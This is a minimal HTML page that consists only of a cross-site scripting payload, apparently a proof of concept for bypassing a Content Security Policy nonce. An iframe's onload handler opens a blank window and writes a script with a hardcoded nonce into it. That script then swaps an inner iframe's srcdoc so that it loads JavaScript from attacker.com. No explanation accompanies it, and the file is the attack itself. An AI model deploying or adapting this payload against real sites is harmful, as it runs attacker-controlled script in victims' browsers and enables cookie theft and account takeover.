<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe onload="w=window.open('about:blank'); w.document.write('<iframe id=GGGxTLzsGGG src=about:blank><\/iframe><script nonce=123>GGGxTLzsGGG.addEventListener(\x22load\x22,()=>{GGGxTLzsGGG.srcdoc=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;},{once:true});<\/script>');"></iframe>
</body>
</html>